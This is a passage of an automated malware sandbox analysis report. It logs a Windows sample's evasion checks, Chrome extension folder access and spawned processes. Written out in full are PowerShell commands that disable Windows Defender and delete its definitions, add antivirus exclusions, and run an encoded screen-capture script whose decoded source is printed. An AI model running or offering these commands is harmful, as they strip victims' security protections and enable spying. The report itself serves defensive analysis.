                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080Thread sleep count: 1116 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564Thread sleep count: 4713 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564Thread sleep count: 1088 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2836Thread sleep time: -9223372036854770s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1260Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF6266483B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00007FF6266483B0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF6266492F0 FindFirstFileExW,FindClose,4_2_00007FF6266492F0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF6266618E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00007FF6266618E4
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF6266492F0 FindFirstFileExW,FindClose,5_2_00007FF6266492F0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF6266618E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00007FF6266618E4
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF6266483B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00007FF6266483B0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C3229 MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFE1FF9F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte,5_2_00007FFDF10C3229
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF150F4C0 GetSystemInfo,5_2_00007FFDF150F4C0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\imagesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_localesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\cssJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\htmlJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bgJump to behavior
                Source: 47SXvEQ.exe, 47SXvEQ.exe, 00000000.00000002.1714111175.0000000001074000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: 47SXvEQ.exe, 00000000.00000002.1714111175.0000000001074000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\47SXvEQ.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\47SXvEQ.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeCode function: 0_2_05F003DF Start: 05F003BA End: 05F003840_2_05F003DF
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C572C5_2_00007FFDF10C572C
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C42415_2_00007FFDF10C4241
                Source: C:\Users\user\Desktop\47SXvEQ.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\47SXvEQ.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\47SXvEQ.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\47SXvEQ.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\47SXvEQ.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\47SXvEQ.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\47SXvEQ.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\47SXvEQ.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\47SXvEQ.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\47SXvEQ.exeFile opened: SICE
                Source: C:\Users\user\Desktop\47SXvEQ.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\47SXvEQ.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeCode function: 0_2_05EE0E98 rdtsc 0_2_05EE0E98
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF62665A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF62665A684
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF1413230 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,5_2_00007FFDF1413230
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF6266634F0 GetProcessHeap,4_2_00007FF6266634F0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF62664C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF62664C910
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF62665A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF62665A684
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF62664D37C SetUnhandledExceptionFilter,4_2_00007FF62664D37C
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF62664D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF62664D19C
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF62664C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF62664C910
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF62665A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF62665A684
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF62664D37C SetUnhandledExceptionFilter,5_2_00007FF62664D37C
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF62664D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF62664D19C
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FA30E8 IsProcessorFeaturePresent,00007FFE103019A0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE103019A0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFDF0FA30E8
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C5A1F IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFDF10C5A1F
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFE101DAA58 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFE101DAA58

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
                Source: C:\ProgramData\Microsoft\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
                Source: C:\ProgramData\Microsoft\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
                Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
